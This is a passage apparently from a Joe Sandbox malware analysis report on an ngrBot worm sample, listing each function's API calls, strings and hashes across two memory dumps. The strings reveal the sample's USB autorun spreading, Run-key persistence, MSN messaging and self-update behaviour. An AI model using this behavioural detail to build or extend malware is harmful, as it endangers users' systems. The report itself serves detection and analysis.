                                                                  • Instruction ID: f5f8fd790bcaf9c40db7213d0d9bd0d66c8d2255c156342998f8a5311ef5fb81
                                                                  • Opcode Fuzzy Hash: 37cc3c8f1d7efab5335082757353a03a82e25d8d8234addcd3faba9dbf623912
                                                                  • Instruction Fuzzy Hash: FCA158B1A40309BBDB10DBA58D85EFF777DEB48704F14455AFA14E3241DAB8DE808B68
                                                                  Function 00370430 Relevance: 112.3, APIs: 51, Strings: 13, Instructions: 334stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,756F59EB), ref: 00370446
                                                                  • GetProcessHeap.KERNEL32(00000008,00000001), ref: 0037044C
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00370453
                                                                  • memset.MSVCRT ref: 0037048B
                                                                  • GetProcessHeap.KERNEL32 ref: 00370493
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003704A9
                                                                  • sscanf.MSVCRT ref: 003704C5
                                                                  • strstr.MSVCRT ref: 003704DC
                                                                  • lstrlenA.KERNEL32(00362780), ref: 003704F0
                                                                  • lstrlenA.KERNEL32(?), ref: 003704FA
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000000), ref: 00370505
                                                                  • strtok.MSVCRT ref: 0037051B
                                                                  • lstrcpyA.KERNEL32(00000000,00371335), ref: 00370534
                                                                  • _memicmp.MSVCRT ref: 00370557
                                                                  • lstrlenA.KERNEL32(00362780), ref: 00370567
                                                                  • _snprintf.MSVCRT ref: 0037057B
                                                                  • _memicmp.MSVCRT ref: 00370596
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003705A7
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003705F1
                                                                  • lstrcatA.KERNEL32(00000000,00372B84), ref: 003705F9
                                                                  • strtok.MSVCRT ref: 00370602
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 0037061C
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 00370624
                                                                  • lstrcatA.KERNEL32(00000000,00362780), ref: 0037062B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0037062E
                                                                  • _snprintf.MSVCRT ref: 00370646
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0037064F
                                                                  • lstrlenA.KERNEL32(?), ref: 0037065A
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000040), ref: 00370667
                                                                  • _snprintf.MSVCRT ref: 00370688
                                                                  • sscanf.MSVCRT ref: 003706A0
                                                                  • strstr.MSVCRT ref: 003706B7
                                                                  • strstr.MSVCRT ref: 003706D2
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003706E6
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 003706F3
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 003706FF
                                                                  • lstrlenA.KERNEL32(00000000), ref: 00370714
                                                                  • lstrlenA.KERNEL32(-00000002), ref: 00370721
                                                                  • lstrcpynA.KERNEL32(?,-00000002,?), ref: 0037072C
                                                                  • lstrlenA.KERNEL32(?), ref: 00370736
                                                                  • lstrlenA.KERNEL32(00362780), ref: 0037073E
                                                                  • HeapAlloc.KERNEL32(?,00000008,?), ref: 0037074B
                                                                  • lstrlenA.KERNEL32(?,?,00362780), ref: 00370761
                                                                  • lstrlenA.KERNEL32(00362780), ref: 0037076A
                                                                  • _snprintf.MSVCRT ref: 00370787
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 0037079F
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003707AC
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003707B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$lstrcat$Alloc$_snprintf$Freestrstr$Process_memicmplstrcpysscanfstrtok$lstrcpynmemset
                                                                  • String ID: $%s%s$Content-Length: $Content-Length: %d$From: $MSG %d %1s$MSG %d %s %d%s%s$Reliability: $SDG $SDG $SDG %d$SDG %d %d$X-MMS-IM-Format:
                                                                  • API String ID: 375969099-2909086048
                                                                  • Opcode ID: be52f0853e725a1216d4c3c8296635939dce930f4491a47f95054c8ed5d16452
                                                                  • Instruction ID: 640415462f80565f19ac411b0996135e811611cefd402e2dd0fdab6c511b66c6
                                                                  • Opcode Fuzzy Hash: be52f0853e725a1216d4c3c8296635939dce930f4491a47f95054c8ed5d16452
                                                                  • Instruction Fuzzy Hash: 05A123B6A00209FBDB35DBA48C85EBF77BCEB48710F148555F90CA6241EA78DE449B60
                                                                  Function 0040F430 Relevance: 96.7, APIs: 47, Strings: 8, Instructions: 431filestringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040F459
                                                                  • memset.MSVCRT ref: 0040F472
                                                                  • memset.MSVCRT ref: 0040F48B
                                                                  • memset.MSVCRT ref: 0040F4A4
                                                                  • memset.MSVCRT ref: 0040F4BD
                                                                  • memset.MSVCRT ref: 0040F4D6
                                                                  • memset.MSVCRT ref: 0040F4F2
                                                                  • memset.MSVCRT ref: 0040F50B
                                                                  • memset.MSVCRT ref: 0040F526
                                                                  • memset.MSVCRT ref: 0040F541
                                                                  • memset.MSVCRT ref: 0040F55C
                                                                  • sprintf.MSVCRT ref: 0040F571
                                                                  • sprintf.MSVCRT ref: 0040F586
                                                                  • wsprintfW.USER32 ref: 0040F5A4
                                                                  • sprintf.MSVCRT ref: 0040F5BC
                                                                  • sprintf.MSVCRT ref: 0040F5D3
                                                                  • sprintf.MSVCRT ref: 0040F5EC
                                                                  • wsprintfW.USER32 ref: 0040F607
                                                                  • wsprintfW.USER32 ref: 0040F61B
                                                                    • Part of subcall function 00401CF0: GetFileAttributesW.KERNEL32(?), ref: 00401CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 0040F64B
                                                                  • _stricmp.MSVCRT(0044A920,00000000), ref: 0040F65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040F6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0040F6AA
                                                                  • GetLastError.KERNEL32 ref: 0040F6B4
                                                                  • CopyFileW.KERNEL32 ref: 0040F6CE
                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 0040F6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F747
                                                                  • lstrcpyA.KERNEL32(?,0000412F), ref: 0040F7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040F7EE
                                                                    • Part of subcall function 00401EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00401ECD
                                                                    • Part of subcall function 00401EA0: GetLastError.KERNEL32 ref: 00401EDA
                                                                  • lstrcatA.KERNEL32(?,00412B84), ref: 0040F800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F813
                                                                  • lstrlenA.KERNEL32(0000412F,?,00000000), ref: 0040F828
                                                                  • WriteFile.KERNEL32(00000000,0000412F,00000000), ref: 0040F837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040F8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 0040F8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0040F901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0040F93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040F984
                                                                  • LockFile.KERNEL32 ref: 0040F98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0040F9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040F9C5
                                                                  • LockFile.KERNEL32 ref: 0040F9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 4df2be5e415b0b3a476115ebffda1eb68d588ce83526194ee57101780f3aea5f
                                                                  • Instruction ID: 20836134fac00eae2ec925ea06fa7d357da684dde9e8a3904e95b43267198c2c
                                                                  • Opcode Fuzzy Hash: 4df2be5e415b0b3a476115ebffda1eb68d588ce83526194ee57101780f3aea5f
                                                                  • Instruction Fuzzy Hash: 2BE195B1950218BAD730DB61CC45FEB777CEB48704F0045BAF609A2591D7B8ABC4CBA9
                                                                  Function 0036F430 Relevance: 96.7, APIs: 47, Strings: 8, Instructions: 431filestringsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F459
                                                                  • memset.MSVCRT ref: 0036F472
                                                                  • memset.MSVCRT ref: 0036F48B
                                                                  • memset.MSVCRT ref: 0036F4A4
                                                                  • memset.MSVCRT ref: 0036F4BD
                                                                  • memset.MSVCRT ref: 0036F4D6
                                                                  • memset.MSVCRT ref: 0036F4F2
                                                                  • memset.MSVCRT ref: 0036F50B
                                                                  • memset.MSVCRT ref: 0036F526
                                                                  • memset.MSVCRT ref: 0036F541
                                                                  • memset.MSVCRT ref: 0036F55C
                                                                  • sprintf.MSVCRT ref: 0036F571
                                                                  • sprintf.MSVCRT ref: 0036F586
                                                                  • wsprintfW.USER32 ref: 0036F5A4
                                                                  • sprintf.MSVCRT ref: 0036F5BC
                                                                  • sprintf.MSVCRT ref: 0036F5D3
                                                                  • sprintf.MSVCRT ref: 0036F5EC
                                                                  • wsprintfW.USER32 ref: 0036F607
                                                                  • wsprintfW.USER32 ref: 0036F61B
                                                                    • Part of subcall function 00361CF0: GetFileAttributesW.KERNEL32(?), ref: 00361CF7
                                                                  • _stricmp.MSVCRT(00000000,ERR), ref: 0036F64B
                                                                  • _stricmp.MSVCRT(003AA920,00000000), ref: 0036F65D
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F684
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F692
                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0036F6A0
                                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 0036F6AA
                                                                  • GetLastError.KERNEL32 ref: 0036F6B4
                                                                  • CopyFileW.KERNEL32 ref: 0036F6CE
                                                                  • lstrlenA.KERNEL32([.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E},00000000), ref: 0036F6DE
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0036F747
                                                                  • lstrcpyA.KERNEL32(?,0000372F), ref: 0036F7DA
                                                                  • lstrcatA.KERNEL32(?,?), ref: 0036F7EE
                                                                    • Part of subcall function 00361EA0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00361ECD
                                                                    • Part of subcall function 00361EA0: GetLastError.KERNEL32 ref: 00361EDA
                                                                  • lstrcatA.KERNEL32(?,00372B84), ref: 0036F800
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0036F813
                                                                  • lstrlenA.KERNEL32(0000372F,?,00000000), ref: 0036F828
                                                                  • WriteFile.KERNEL32(00000000,0000372F,00000000), ref: 0036F837
                                                                  • lstrlenA.KERNEL32(?,?,00000000), ref: 0036F87C
                                                                  • WriteFile.KERNEL32(00000000,?,00000000), ref: 0036F88B
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036F8B1
                                                                  • Sleep.KERNEL32(00000032), ref: 0036F8C4
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0036F901
                                                                  • SetFileAttributesA.KERNEL32(?,00000004), ref: 0036F93A
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0036F97D
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0036F984
                                                                  • LockFile.KERNEL32 ref: 0036F98D
                                                                  • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 0036F9BE
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0036F9C5
                                                                  • LockFile.KERNEL32 ref: 0036F9CE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: File$memset$Attributes$Createsprintf$lstrlen$wsprintf$ErrorLastLockSizeWrite_stricmplstrcat$CloseCopyDirectoryHandleSleeplstrcpy
                                                                  • String ID: %S%S\Desktop.ini$%s%s$%s\%s$%sautorun.inf$%sautorun.tmp$ERR$[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}$usbi
                                                                  • API String ID: 2867265384-3663527224
                                                                  • Opcode ID: 4dcc7d63e8885bd670eef82c73a7ad8339453c055c23c0a2d30338946c95b2a7
                                                                  • Instruction ID: a7a7fc056f54bdcfb8c75744358e17bbb893a6b436a0b566b806db3fb1d4628d
                                                                  • Opcode Fuzzy Hash: 4dcc7d63e8885bd670eef82c73a7ad8339453c055c23c0a2d30338946c95b2a7
                                                                  • Instruction Fuzzy Hash: 86E1B7B2940218AED732DB64DC86FEA777CEF49740F008599F60DA6085D7B46B84CFA1
                                                                  Function 0040E9F0 Relevance: 75.5, APIs: 31, Strings: 12, Instructions: 271stringfilethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040EA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 0040EA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 0040EA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 0040EA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,004157AC), ref: 0040EA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040EA44
                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407351
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(?), ref: 00407369
                                                                    • Part of subcall function 00407330: _snprintf.MSVCRT ref: 00407381
                                                                    • Part of subcall function 00407330: _vsnprintf.MSVCRT ref: 004073A3
                                                                    • Part of subcall function 00407330: lstrlenA.KERNEL32(00000000), ref: 004073B2
                                                                  • CopyFileW.KERNEL32 ref: 0040EACF
                                                                    • Part of subcall function 0040D6B0: RegSetValueExW.ADVAPI32 ref: 0040D731
                                                                    • Part of subcall function 0040D6B0: RegCloseKey.ADVAPI32(?), ref: 0040D740
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040EAFC
                                                                    • Part of subcall function 00401AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00401AE9
                                                                  • DeleteFileW.KERNEL32(0044AFB0), ref: 0040EB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040EB3A
                                                                  • DeleteFileW.KERNEL32(0044AFB0), ref: 0040EB41
                                                                  • lstrcpyA.KERNEL32(0044A920,ERR), ref: 0040EB61
                                                                  • lstrlenA.KERNEL32(004157C0), ref: 0040EB72
                                                                  • lstrlenA.KERNEL32(004157C0), ref: 0040EBB5
                                                                  • _snprintf.MSVCRT ref: 0040EBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040EC15
                                                                  • InitializeCriticalSection.KERNEL32(0044B3C8), ref: 0040EC32
                                                                  • memset.MSVCRT ref: 0040EC5F
                                                                  • wsprintfW.USER32 ref: 0040EC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 0040EC95
                                                                  • GetLastError.KERNEL32 ref: 0040EC97
                                                                    • Part of subcall function 00401CF0: GetFileAttributesW.KERNEL32(?), ref: 00401CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 0040ECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040E990,00000000,00000000,00000000), ref: 0040ECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ECCF
                                                                  • lstrlenA.KERNEL32(0044B3E0), ref: 0040ED26
                                                                  • lstrlenA.KERNEL32(0044AC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 0040ED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,0044B990,00000000,00000000), ref: 0040ED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040ED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,0040FC90,00000000,00000000,00000000), ref: 0040EDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040EDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 785f02e02b6062c830e1d19d2130aed33bc429aacb152919f8111683079fffbd
                                                                  • Instruction ID: 291cbe2c5dc0da0963d39d682a8af24ece4c38724fc749192e7a20bc4a0e5367
                                                                  • Opcode Fuzzy Hash: 785f02e02b6062c830e1d19d2130aed33bc429aacb152919f8111683079fffbd
                                                                  • Instruction Fuzzy Hash: 058129B5BC031476F620B7625D47F9B36189B44F04F244437FB04B52D2DAFCA6A08AAE
                                                                  Function 0036E9F0 Relevance: 75.5, APIs: 31, Strings: 12, Instructions: 271stringfilethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036EA0F
                                                                  • LoadLibraryW.KERNEL32(ws2_32.dll), ref: 0036EA22
                                                                  • LoadLibraryW.KERNEL32(secur32.dll), ref: 0036EA29
                                                                  • LoadLibraryW.KERNEL32(wininet.dll), ref: 0036EA30
                                                                  • CreateMutexA.KERNEL32(00000000,00000000,003757AC), ref: 0036EA3B
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0036EA44
                                                                    • Part of subcall function 00367330: memset.MSVCRT ref: 00367351
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(?), ref: 00367369
                                                                    • Part of subcall function 00367330: _snprintf.MSVCRT ref: 00367381
                                                                    • Part of subcall function 00367330: _vsnprintf.MSVCRT ref: 003673A3
                                                                    • Part of subcall function 00367330: lstrlenA.KERNEL32(00000000), ref: 003673B2
                                                                  • CopyFileW.KERNEL32 ref: 0036EACF
                                                                    • Part of subcall function 0036D6B0: RegSetValueExW.ADVAPI32 ref: 0036D731
                                                                    • Part of subcall function 0036D6B0: RegCloseKey.ADVAPI32(?), ref: 0036D740
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036EAFC
                                                                    • Part of subcall function 00361AD0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00361AE9
                                                                  • DeleteFileW.KERNEL32(003AAFB0), ref: 0036EB2F
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036EB3A
                                                                  • DeleteFileW.KERNEL32(003AAFB0), ref: 0036EB41
                                                                  • lstrcpyA.KERNEL32(003AA920,ERR), ref: 0036EB61
                                                                  • lstrlenA.KERNEL32(003757C0), ref: 0036EB72
                                                                  • lstrlenA.KERNEL32(003757C0), ref: 0036EBB5
                                                                  • _snprintf.MSVCRT ref: 0036EBDE
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036EC15
                                                                  • InitializeCriticalSection.KERNEL32(003AB3C8), ref: 0036EC32
                                                                  • memset.MSVCRT ref: 0036EC5F
                                                                  • wsprintfW.USER32 ref: 0036EC75
                                                                  • DeleteFileW.KERNEL32(?), ref: 0036EC95
                                                                  • GetLastError.KERNEL32 ref: 0036EC97
                                                                    • Part of subcall function 00361CF0: GetFileAttributesW.KERNEL32(?), ref: 00361CF7
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E880,00000000,00000000,00000000), ref: 0036ECB2
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ECBB
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036E990,00000000,00000000,00000000), ref: 0036ECCC
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ECCF
                                                                  • lstrlenA.KERNEL32(003AB3E0), ref: 0036ED26
                                                                  • lstrlenA.KERNEL32(003AAC50,?,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000), ref: 0036ED5E
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000E770,003AB990,00000000,00000000), ref: 0036ED83
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036ED86
                                                                  • CreateThread.KERNEL32(00000000,00000000,0036FC90,00000000,00000000,00000000), ref: 0036EDA1
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036EDA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$File$CloseCreate$HandleThread$DeleteLibraryLoadmemset$SleepTime_snprintf$AttributesCopyCriticalErrorInitializeLastMutexObjectSectionSingleSystemValueWait_vsnprintflstrcpywsprintf
                                                                  • String ID: %s:Zone.Identifier$ERR$IPC_Check$Software\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run$msnint$msnmsg$ngrBot$running$secur32.dll$wininet.dll$ws2_32.dll
                                                                  • API String ID: 4164503275-3436408089
                                                                  • Opcode ID: 3eeae9711479cb74740bd79a26ce78fec5d0a53f7fd22cc0af4307f74f1ae61c
                                                                  • Instruction ID: f7aed142dd84945b1934cbe5a76ceaee49b44c94a2fd342b0c7cb307c7ebf635
                                                                  • Opcode Fuzzy Hash: 3eeae9711479cb74740bd79a26ce78fec5d0a53f7fd22cc0af4307f74f1ae61c
                                                                  • Instruction Fuzzy Hash: FD81F6BABC03147AE67377A49C47FDB765CDB01F00F14C014FA09BA1D6DBE466448AAA
                                                                  Function 0040E130 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 255sleepstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0044B3C8), ref: 0040E14B
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A013
                                                                    • Part of subcall function 00409FF0: strtok.MSVCRT ref: 0040A04F
                                                                  • GetLastError.KERNEL32 ref: 0040E17E
                                                                  • GetLastError.KERNEL32 ref: 0040E18B
                                                                  • GetLastError.KERNEL32 ref: 0040E198
                                                                  • GetLastError.KERNEL32 ref: 0040E1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 0040E1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0040E22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040E24D
                                                                  • _memicmp.MSVCRT ref: 0040E259
                                                                  • MoveFileExW.KERNEL32(00000000,0044ADA0,0000000B), ref: 0040E292
                                                                  • MoveFileExW.KERNEL32(00000000,0044ADA0,00000004), ref: 0040E2A4
                                                                  • lstrcpyA.KERNEL32(0044A920,00000000), ref: 0040E2C0
                                                                  • lstrcmpA.KERNEL32(?,00412C7C), ref: 0040E2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 0040E2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 0040E30A
                                                                    • Part of subcall function 0040BA00: memset.MSVCRT ref: 0040BA1E
                                                                    • Part of subcall function 0040BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0040BA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 0040E43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0040E45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040E46B
                                                                  • LeaveCriticalSection.KERNEL32(0044B3C8), ref: 0040E478
                                                                  Strings
                                                                  • [d="%s"] Error writing download to "%S" [e="%d"], xrefs: 0040E383, 0040E3AE
                                                                  • QUIT :%s, xrefs: 0040E2E3
                                                                  • bsod, xrefs: 0040E312
                                                                  • [d="%s"] Error getting temporary filename. [e="%d"], xrefs: 0040E3D1
                                                                  • [d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"], xrefs: 0040E36E
                                                                  • [d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s), xrefs: 0040E359
                                                                  • [d="%s"] Error downloading file [e="%d"], xrefs: 0040E405
                                                                  • [d='%s"] Error getting application data path [e="%d"], xrefs: 0040E3F4
                                                                  • [d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d, xrefs: 0040E41C
                                                                  • rebooting, xrefs: 0040E2DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastSleep$File$CriticalMoveSectionstrtok$??3@DeleteEnterFreeHeapLeave_memicmplstrcmplstrcpylstrlenmemsetwvsprintf
                                                                  • String ID: QUIT :%s$[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]$[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)$[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d$[d="%s"] Error downloading file [e="%d"]$[d="%s"] Error getting temporary filename. [e="%d"]$[d="%s"] Error writing download to "%S" [e="%d"]$[d='%s"] Error getting application data path [e="%d"]$bsod$rebooting
                                                                  • API String ID: 4206007775-4213298338
                                                                  • Opcode ID: 8383eb135d202b3d787de8f53a1fe34e0e97aac98dfb618f54b5d29d449e51f8
                                                                  • Instruction ID: bdb515e0d9e3ba4769888a699288c0d0595d26c5ffdf0716fbe6c9d3270b13c6
                                                                  • Opcode Fuzzy Hash: 8383eb135d202b3d787de8f53a1fe34e0e97aac98dfb618f54b5d29d449e51f8
                                                                  • Instruction Fuzzy Hash: 9381A9B0A40304BBE7109BA6DC45FAF7778EF44704B20893BFA51B22D1D67899508A6E
                                                                  Function 0036E130 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 255sleepstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(003AB3C8), ref: 0036E14B
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A013
                                                                    • Part of subcall function 00369FF0: strtok.MSVCRT ref: 0036A04F
                                                                  • GetLastError.KERNEL32 ref: 0036E17E
                                                                  • GetLastError.KERNEL32 ref: 0036E18B
                                                                  • GetLastError.KERNEL32 ref: 0036E198
                                                                  • GetLastError.KERNEL32 ref: 0036E1A5
                                                                  • Sleep.KERNEL32(00003A98), ref: 0036E1C8
                                                                  • Sleep.KERNEL32(000003E8), ref: 0036E22B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 0036E24D
                                                                  • _memicmp.MSVCRT ref: 0036E259
                                                                  • MoveFileExW.KERNEL32(00000000,003AADA0,0000000B), ref: 0036E292
                                                                  • MoveFileExW.KERNEL32(00000000,003AADA0,00000004), ref: 0036E2A4
                                                                  • lstrcpyA.KERNEL32(003AA920,00000000), ref: 0036E2C0
                                                                  • lstrcmpA.KERNEL32(?,00372C7C), ref: 0036E2D3
                                                                  • Sleep.KERNEL32(000007D0), ref: 0036E2FA
                                                                  • Sleep.KERNEL32(000007D0), ref: 0036E30A
                                                                    • Part of subcall function 0036BA00: memset.MSVCRT ref: 0036BA1E
                                                                    • Part of subcall function 0036BA00: wvsprintfA.USER32(00000000,00000000,00000000), ref: 0036BA42
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 0036E43A
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 0036E45D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 0036E46B
